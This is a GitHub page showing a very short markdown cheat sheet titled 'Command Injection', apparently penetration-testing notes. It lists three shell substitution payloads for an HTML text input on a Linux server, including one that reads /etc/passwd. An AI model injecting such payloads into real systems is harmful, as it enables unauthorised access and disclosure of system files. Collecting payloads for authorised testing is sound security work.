Skip to content

Latest commit

 

History

History
8 lines (7 loc) · 105 Bytes

COMMAND-INJECTION.md

File metadata and controls

8 lines (7 loc) · 105 Bytes

Command Injection

# In HTML Input text (server with linux)
$(id)
$(pwd)
$(cat /etc/passwd)